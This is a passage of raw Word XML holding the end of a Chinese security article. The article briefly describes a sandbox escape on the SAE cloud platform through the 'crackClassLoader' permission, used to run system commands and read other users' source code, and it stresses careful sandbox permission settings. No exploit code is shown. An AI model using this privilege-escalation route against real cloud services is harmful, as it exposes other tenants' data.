          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SAE</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>上的沙盒权限允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“crackClassLoader”</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>做到的，绕过权限后，作者调用了系统命令，去读取其他云用户的源代码。沙盒，尤其是用在云上的沙盒，安全配置是很重要的，很多权限并不是可以随便交给用户的，这次有了</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>crackCLassLoaer</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，基本上是一个最好用的提权办法了，其实还有很多其他的权限，都是很不安全的。这要仔细斟酌以后，才能开给用户，否则就是一个灾难。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564D2E" w:rsidRPr="00564D2E" w:rsidRDefault="00564D2E" w:rsidP="00564D2E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:after="330" w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>空虚浪子心</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://www.inbreak.net </w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>微博：</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://t.qq.com/javasecurity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00564D2E" w:rsidRDefault="007A5775" w:rsidP="00564D2E">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="007A5775" w:rsidRPr="00564D2E" w:rsidSect="00B07B2B">
      <w:headerReference w:type="even" r:id="rId16"/>
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="even" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId19"/>
      <w:headerReference w:type="first" r:id="rId20"/>
      <w:footerReference w:type="first" r:id="rId21"/>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49A" w:rsidRDefault="0022649A" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0022649A" w:rsidRDefault="0022649A"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564D2E">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>5</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564D2E">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>6</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49A" w:rsidRDefault="0022649A" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0022649A" w:rsidRDefault="0022649A"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22649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22649A"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22649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6F0B"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="001256E1"/>
    <w:rsid w:val="00132A14"/>
    <w:rsid w:val="00186F0B"/>
    <w:rsid w:val="001A657E"/>
    <w:rsid w:val="002176D3"/>
    <w:rsid w:val="00225B8A"/>
    <w:rsid w:val="0022649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64D2E"/>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2193DB5-5366-466E-B37F-215C1FDE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semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00564D2E"/>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564D2E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00564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564D2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504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1020159120">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1867212206">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1499688576">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2003577386">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1232430149">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="38256363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61750299">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="723212126">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="331496438">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="528764711">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2035768717">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1908227164">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="C0C0C0"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="48786529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break.net/wp-content/uploads/2012/07/image001.pn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nbreak.net/wp-content/uploads/2012/07/image003.p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inbreak.net/wp-content/uploads/2012/07/image002.p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break.net/wp-content/uploads/2012/07/image004.p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0687-2D4B-4B93-A666-A321D998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2016-12-04T13:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-04T13:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>